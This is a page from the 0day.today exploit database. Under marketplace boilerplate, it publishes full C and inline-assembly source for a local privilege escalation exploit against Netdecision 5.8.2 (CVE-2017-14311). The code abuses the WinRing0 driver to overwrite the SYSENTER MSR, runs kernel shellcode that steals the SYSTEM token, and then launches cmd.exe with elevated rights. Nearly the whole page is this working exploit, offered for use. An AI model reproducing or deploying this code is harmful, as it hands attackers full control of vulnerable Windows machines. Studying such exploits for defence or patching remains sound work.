0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Netdecision 5.8.2 - Local Privilege Escalation Exploit
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
// Netdecision.cpp : Defines the entry point for the console application. /* # Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys # Date: 2017.09.17 # Exploit Author: Peter Baris # Vendor Homepage: www.netmechanica.com # Software Link: http://www.netmechanica.com/downloads/ //registration required # Version: 5.8.2 # Tested on: Windows 7 Pro SP1 x86 / Windows 7 Enterprise SP1 # CVE : CVE-2017-14311 Vendor notified on 2017.09.11 - no response */ #include "stdafx.h" #include <stdio.h> #include <Windows.h> #include <winioctl.h> #include <tlhelp32.h> #include <Psapi.h> #define DEVICE_NAME L"\\\\.\\WinRing0_1_2_0" LPCTSTR FileName = (LPCTSTR)DEVICE_NAME; HANDLE GetDeviceHandle(LPCTSTR FileName) { HANDLE hFile = NULL; hFile = CreateFile(FileName, GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, NULL, 0); return hFile; } extern ULONG ZwYieldExecution = NULL; extern PVOID KernelBaseAddressInKernelMode = NULL; extern HMODULE hKernelInUserMode = NULL; VOID GetKiFastSystemCall() { SIZE_T ReturnLength; HMODULE hntdll = NULL; ULONG ZwYieldExecution_offset; hntdll = LoadLibraryA("ntdll.dll"); if (!hntdll) { printf("[-] Failed to Load ntdll.dll: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } LPVOID drivers[1024]; DWORD cbNeeded; EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded); KernelBaseAddressInKernelMode = drivers[0]; printf("[+] Kernel base address: 0x%X\n", KernelBaseAddressInKernelMode); hKernelInUserMode = LoadLibraryA("ntkrnlpa.exe"); if (!hKernelInUserMode) { printf("[-] Failed to load kernel: 0x%X\n", GetLastError()); exit; } printf("[+] KernelImage Base in User-Mode 0x%X\r\n", hKernelInUserMode); ZwYieldExecution = GetProcAddress(hKernelInUserMode, "ZwYieldExecution"); if (!ZwYieldExecution) { printf("[-] Failed to resolve KiFastSystemCall: 0x%X\n", GetLastError()); exit; } ZwYieldExecution_offset = (ULONG)ZwYieldExecution - (ULONG)hKernelInUserMode; printf("[+] ZwYieldExecution's offset address in ntkrnlpa.exe: 0x%X\n", ZwYieldExecution_offset); (ULONG)ZwYieldExecution = (ULONG)ZwYieldExecution_offset + (ULONG)KernelBaseAddressInKernelMode; printf("[+] ZwYieldExecution's address in kernel-mode: 0x%X\n", ZwYieldExecution); if (hntdll) { FreeLibrary(hntdll); } if (hKernelInUserMode) { FreeLibrary(hKernelInUserMode); } hntdll = NULL; return hKernelInUserMode; return ZwYieldExecution; } extern ULONG eip = NULL; extern ULONG pesp = NULL; extern ULONG pebp = NULL; extern ULONG ETHREAD = NULL; ULONG Shellcode() { ULONG FunctionAddress = ZwYieldExecution; __asm { pushad pushfd xor eax,eax mov edi, FunctionAddress ; Address of ZwYieldExection to EDI SearchCall: mov eax, 0xe8 scasb jnz SearchCall mov ebx, edi mov ecx, [edi] add ebx, ecx; EBX points to KiSystemService add ebx, 0x4 lea edi, [ebx - 0x1] SearchFastCallEntry: mov eax, 0x00000023 scasd jnz SearchFastCallEntry mov eax, 0xa10f306a scasd jnz SearchFastCallEntry lea eax,[edi-0x9] xor edx, edx mov ecx, 0x176 wrmsr popfd popad mov eax,ETHREAD mov eax,[eax] mov eax, [eax+0x050] mov ecx, eax mov edx, 0x4 FindSystemProcess : mov eax, [eax + 0x0B8] sub eax, 0x0B8 cmp[eax + 0x0B4], edx jne FindSystemProcess mov edx, [eax + 0x0F8] mov[ecx + 0x0F8], edx ;xor eax, eax mov esp,pesp mov ebp,pebp push eip ; int 3 ret } } int main() { HANDLE hlib = NULL; HANDLE hFile = NULL; PVOID lpInBuffer = NULL; ULONG lpOutBuffer = NULL; ULONG lpBytesReturned; PVOID BuffAddress = NULL; SIZE_T BufferSize = 0x1000; SIZE_T nOutBufferSize = 0x800; ULONG Interval = 0; ULONG Shell = &Shellcode; NTSTATUS NtStatus = NULL; /* Undocumented feature to trigger the vulnerability */ hlib = LoadLibraryA("ntdll.dll"); if (!hlib) { printf("[-] Failed to load the library: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } GetKiFastSystemCall(); /* Allocate memory for our input and output buffers */ lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); /*Getting KiFastSystemCall address from ntdll.dll to restore it in 0x176 MSR*/ lpOutBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); //printf("[+] Address to write our shellcode's address to: 0x%X\r\n", lpOutBuffer); /* Crafting the input buffer */ BuffAddress = (PVOID)(((ULONG)lpInBuffer)); *(PULONG)BuffAddress = (ULONG)0x00000176; /*IA32_SYSENTER_EIP MSR*/ BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x4)); *(PULONG)BuffAddress = (ULONG)Shell; /*Our assembly shellcode Pointer into EAX*/ BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x8)); *(PULONG)BuffAddress = (ULONG)0x00000000; /* EDX is 0x00000000 in 32bit mode */ BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0xc)); *(PULONG)BuffAddress = (ULONG)0x00000000; //RtlFillMemory(lpInBuffer, BufferSize, 0x41); //RtlFillMemory(lpOutBuffer, BufferSize, 0x42); //printf("[+] Trying the get the handle for the WinRing0_1_2_0 device.\r\n"); hFile = GetDeviceHandle(FileName); if (hFile == INVALID_HANDLE_VALUE) { printf("[-] Can't get the device handle. 0x%X\r\n", GetLastError()); return 1; } else { printf("[+] Handle opened for WinRing0x32. Sending IOCTL.\r\n"); } /*Here we calculate the EIP for our return from kernel-mode. This exploit does not let us simply adjust the stack and return*/ (HANDLE)eip = GetModuleHandleA(NULL); /*Getting the base address of our process*/ printf("[+] Current process base address 0x%X\r\n", (HANDLE)eip); (HANDLE)eip = eip + 0x13ae; /*Any time you change something in the main() section you MUST adjust the offset to point to the PUSH 40 instrction*/ printf("[+] Return address (EIP) from kernel-mode 0x%X\r\n", (HANDLE)eip); /*Setting CPU affinity before execution to maximize the chance of executing our code on the same CPU core*/ DWORD_PTR i = 1; /*CPU Core with ID 1 will be always chosen for the execution*/ ULONG affinity = SetThreadAffinityMask(GetCurrentThread(), i); printf("[+] Setting affinity for logical CPU with ID:%d\r\n", i); if (affinity == NULL) { printf("[-] Something went wrong while setting CPU affinity 0x%X\r\n", GetLastError()); exit(1); } ETHREAD = (ULONG)KernelBaseAddressInKernelMode + 0x12bd24; /*Offset to nt!KiInitialThread as TEB is not readable*/ /*Saving stack pointer and stack frame of user-mode before diving in kernel-mode to restore it before returning to user-mode */ __asm { mov pesp, esp mov pebp, ebp nop } DeviceIoControl(hFile, 0x9C402088, lpInBuffer, 0x10, lpOutBuffer, 0x20, &lpBytesReturned, NULL); STARTUPINFO info = { sizeof(info) }; PROCESS_INFORMATION processInfo; NTSTATUS proc; LPCSTR command = L"C:\\Windows\\System32\\cmd.exe"; proc = CreateProcess(command, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &info, &processInfo); if (!proc) { printf("ERROR 0x%X\r\n", proc); } WaitForSingleObject(processInfo.hProcess, INFINITE); exit(0); } # 0day.today [2024-12-24] #